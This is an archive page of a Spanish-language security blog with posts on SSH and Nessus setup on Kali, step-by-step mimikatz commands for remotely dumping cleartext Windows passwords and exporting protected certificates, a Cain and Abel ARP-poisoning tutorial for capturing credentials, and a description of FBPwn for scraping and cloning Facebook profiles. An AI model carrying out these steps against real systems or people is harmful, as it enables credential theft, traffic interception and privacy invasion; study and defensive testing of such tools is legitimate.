Mostrando entradas con la etiqueta Seguridad de la Información. Mostrar todas las entradas
Mostrando entradas con la etiqueta Seguridad de la Información. Mostrar todas las entradas

lunes, 22 de agosto de 2016

Acceso a kali por ssh (configuración)



SSH (Secure SHell, en español: intérprete de órdenes seguro) es el nombre de un protocolo y del programa que lo implementa, y sirve para acceder a máquinas remotas a través de una red. Permite manejar por completo la computadora mediante un intérprete de comandos, y también puede redirigir el tráfico de X (Sistema de Ventanas X) para poder ejecutar programas gráficos si tenemos ejecutando un Servidor X (en sistemas Unix y Windows).

Aveces necesitamos conectarnos a nuestro computador para realizar x tarea, en particular hablamos de nuestro querido kali linux y para hacerlo necesitamos conectarnos a el de forma segura, podemos hacerlo desde nuestro teléfono android incluso, peropara hacerlo tenemos que hacer algunas cositas...
veamos unos pasos

1.Instalar en  Kali Linux remote SSH – openSSH server o el servidor ssh
2.Habilitar el servicio SSH remoto en kali Linux al arranque

martes, 26 de noviembre de 2013

Nessus en Kali Linux : Instalación e integración con Metasploit

Descargar e instalar Nessus

Primero, tenemos que ir a aquí y aceptar el acuerdo de licencia. Tras aceptarlo, tenemos que elegir la plataforma para la que queremos descargar el instalador, en nuestro caso, como es Backtrack 5, elegiremos la versión para Ubuntu 9.10/10.04 (en mi caso de 32 bits).

Ahora, para instalarlo tenemos que ejecutar:
1sudo dpkg -i Nessus-4.4.1-ubuntu910_i386.deb

Una vez instalado nos dice que tenemos que añadir un usuario mediante:
1/opt/nessus/sbin/nessus-adduser
Entonces, nos pedirá que introduzcamos los datos del usuario de Nessus, en este caso: login, contraseña, si es administrador o no y las reglas del usuario.

Registrando Nessus

Si no se registra en la página oficial, no se podrán utilizar los plugins para el descubrimiento de vulnerabilidades así que entraremos aquí para registrarlo, y seleccionamos la opción Using Nessus at Home. Aceptamos el acuerdo de licencia e introducimos nuestros datos para que nos llegue al correo el código de activación.
En el correo que nos llegará además del código de activación nos indican como hay que activar el producto dependiendo de que sistema operativo tengamos, en nuestro caso, como Backtrack realmente está basado sobre Ubuntu, solo tenemos que:
1/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX
Una vez hecho esto nos dará confirmación que el producto está ya activado y descargará los plugins más recientes.

Integrando Nessus con Metasploit

Para arrancar el demonio de Nessus podemos ejecutar:
1/etc/init.d/nessusd start
Ahora mismo ya está funcionando, si queremos acceder basta con ir a la siguiente url: https://localhost:8834 y loguearnos con el usuario (o usuarios) que registramos anteriormente.
Para integrarlo con Metasploit, tenemos que iniciar Metasploit primero, ya sea mediante el menú de Backtrack, o mediante el comando:
1msfconsole
Una vez haya arrancado Metasploit, con load nessuscargamos el módulo de metasploit que hace de puente con Nessus.

Ahora, recordando las credenciales del usuario que registramos anteriormente, utilizamos, para conectar con Nessus el siguiente comando:
1nessus_connect usuario:password@127.0.0.1 ok
Una vez ya conectado podemos con nessus_policy_list mostrar las políticas de escaneo que tengamos configuradas en Nessus, y para lanzar el escaneo nessus_scan_new idPolitica Escaneo01 192.168.0.0/24 o indicar un dirección de red en lugar de un rango. Una vez finalizado el escaneo, con los comandos nessus_report_list y nessus_report_get podremos revisar los reportes e importarlos a la base de datos de Metasploit respectivamente.

lunes, 9 de julio de 2012

Volcado de contraseñas con mimikatz



mimikatz es una herramienta que entre otras características permite el volcado de contraseñas en texto claro de un sistema Windows, la exportación de certificados marcados como no exportables o la obtención de hashes de la SAM.




Una de las principales ventajas que presenta frente a otras herramientas como wce, es que aún no es demasiado popular y los antivirus no la detectan como aplicación maliciosa. Tan solo 5 de 41 la tienen catalogada como tal. ¡A ver lo que dura!








Para ver cómo funciona, mejor ver algunos ejemplos de uso.




1.- Nombre de usuario y PC

Para empezar y ver la sintaxis, algo sencillo. Obtención del nombre de usuario y el PC.




a.- Iniciar mimikatz desde la ruta en la que se haya descargado e invocar el módulo system con el comando "user" para sacar el nombre de usuario: system::user




b.- El nombre del equipo con el comando "computer" del módulo system:system::computer. Sencillo, ¿verdad?





2.- Contraseñas en claro de un dominio.

Como es lógico, es necesario tener permisos de administrador ya que la herramienta no explota ninguna vulnerabilidad de escalada de privilegios. En este ejemplo se hará uso junto a psexec de sysinternals para el uso remoto contra la dirección IP remota: 172.16.X.X




a.- Se autentica contra el servidor remoto (del que se volcarán las contraseñas) mediante el comando: net use \\172.16.X.X\admin$ que solicitará las credenciales.




b.- Se copia la librería auxiliar "sekurla.dll" en el directorio System32 del sistema remoto, proporcionada con el propio mimikatz: copy sekurla.dll \\172.16.X.X\admin$\system32




c.- El tercer paso es la ejecución de mimikatz, usando la arquitectura que corresponda, ya sea 32 o 64 bits: psexec /accepteula \\172.16.X.X\ -c mimikatz.exe




d.- Una vez arrancado se verifica que hay acceso al privilegio: SeDebugPrivilege, con el comando: privilege::debug aunque esto no es necesario si se tiene acceso SYSTEM.

e.- Se procede a inyectar la librería en el proceso de LSASS: inject::process lsass.exe sekurlsa.dll




f.- Por último, se solicitan las contraseñas con: @getLogonPasswords





Solucionar el problema no es sencillo, ya que requiere deshabilitar los Security Support Providers (SSP) TsPkg y Wdigest de la clave: HKLM\SYSTEM\CurrentControlSet\Control\LSA\Security Packages en caso de Windows 7 y 2008, opción no soportada por Microsoft y que rompe el Network Level Authentication (NLA) de RDP, dejando este de funcionar.




3.- Exportación de certificados.

Para exportar certificados, marcados como NO exportables, mimikatz parchea la CryptoApi y luego intenta la exportación. El ejemplo para mi equipo local:




a.- Se arranca mimikatz ejecutando el binario de la arquitectura que corresponda:C:\tmp\mimikatzz\x64\mimikatz




b.- Igual que en el caso anterior, se verifica el acceso a SeDebugPrivilege mediante:privilege::debug que debe responder "OK".




c.- Se procede al parcheo de la CryptoApi con el comando: crypto::patchcapi




d.- Se intentan exportar dos veces los certificados con la instrucción: crypto::exportCertificatespero falla, indicándolo con un resultado "KO".




e.- Cuando esto ocurre, hay que probar varias veces a parchear la cryptoapi y exportar, hasta que funciona tal y como muestra la captura. Dependiendo de la versión de Windows, será necesario usarcrypto::patchcapi o por el contrario crypto::patchcng





Referencias:

http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html

http://computer-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain-accounts-disabling-encrypted-passwords#

http://blog.gentilkiwi.com/mimikatz

Leer más: Segu-Info: Volcado de contraseñas con mimikatz http://blog.segu-info.com.ar/2012/07/volcado-de-contrasenas-con-mimikatz.html#ixzz20AtcDPA0
Under Creative Commons License: Attribution Non-Commercial Share Alike

viernes, 20 de abril de 2012

Man in the middle con Cain y Abel (Tutorial)


Man in the middle con Cain y Abel

Hola!
Muy buenas a todos/as!
El ataque del “hombre en el medio” es algo, que no es nuevo ni mucho menos.
He creado un escenario súper sencillo en una red local.
El escenario es el siguiente.
Tenemos el pc de usuario en una parte de la red LOCAL y luego el atacante, con el símbolo del DragoN.
El atcante tiene Windows 7 y el usuario Windows XP.
Lo que haremos primero será poner la tarjeta en modo promiscuo, de manera que pondremos la tarjeta a escuchar todos los paquetes en la red.
Aquí tenemos el rango de la red LOCAL en el cual, nos mantendremos a la escucha.
Ahora detectaremos los equipos en la red, para poder hacer el ataque
Activamos el snifer y el ARP en Cain y Abel
En la pestaña de Snifer y en Hosts, escaneamos por MAC ADRESS.
Seleccionamos hacer todos los test para que empiece a descubrir todos los equipos de la red.
Podemos ver los equipos que va encontrando
Ahora que ya sabemos las IP de la red local, le damos a la tecla +
Aquí tenemos las diferentes IP’s, seleccionamos la Ip de la puerta de enlace.
Seleccionamos todos los host para hacer el man in the middle, y hacer poisoning
El ataque man in the middle ya ha empezado.
El ataque poisoning, ya está haciendo efecto, hasta que veremos lo siguiente
Podemos ver abajo el aviso de Full-routing, significa que el ataque man in the middle ha tenido éxito.
Y cuando el usuario acceda con algunas credenciales, como HTTP,  FTP,  SMB, quedarán registradas en Cain y Abel
Y hasta aquí un proceso de ataque de Man in the middle con Cain y Abel

El post original pueden verlo desde aqui
Si les funciona quiero comentarios ... saludos =D

martes, 17 de enero de 2012

FBPwn – Facebook Social Engineering Framework


FBPWN es una plataforma basada en Java de para realizar ingeniería social a Facebook y sacar toda la información necesaria de un usuario, esta herramienta se puede utilizar para intentar descargar o atacar cuentas de usuario en Facebook directamente desde un Framework este puede realizar lo siguiente:
·         Volcar lista de amigos.
·         Agregar todos los amigos de la víctima.
·         Volcar todas las imágenes del álbumes de usuarios.
·         Volcado de la información del perfil.
·         Volcado de Fotos de perfil (Imágenes de perfil).
·         Comprobar solicitud de amigos.
·         Volcado los datos del muro de la víctima.
·         Clon de los perfiles.
  
Para poder realizar el volcado de datos agregue un usuario valido con su nombre y contraseña.
Este se autenticara y le permitirá agregar a un usuario víctima y realizar todos lo que se muestra en la imagen siguiente y descrito anteriormente.

Toda la información se almacena localmente por lo que incluso si la víctima desactiva su cuenta el atacante. Yo recomendaría esta herramienta como un material de sensibilización para sus amigos y nivel corporativo, para entender los riesgos de compartir información en línea.

Descargue el vídeo tutorial de FBPwn
https://rapidshare.com/files/507532677/FBPwn-Video-Tutorial.ogv


Créditos totales a http://www.binaryti.com